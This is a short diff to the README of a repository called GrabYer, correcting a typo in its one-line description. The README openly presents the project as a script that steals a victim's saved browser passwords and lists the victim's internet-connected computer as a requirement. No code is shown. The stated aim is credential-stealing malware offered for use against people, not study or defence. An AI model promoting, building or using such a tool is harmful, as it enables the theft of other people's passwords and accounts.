shiwoshiwo69/GrabYer/README.md

 ### GrabYer
-A small scripts that steals your victim's browser saved passwords.
+A small script that steals your victim's browser saved passwords.

 ### Requirements
 1. Your victim's computer (connected to the internet).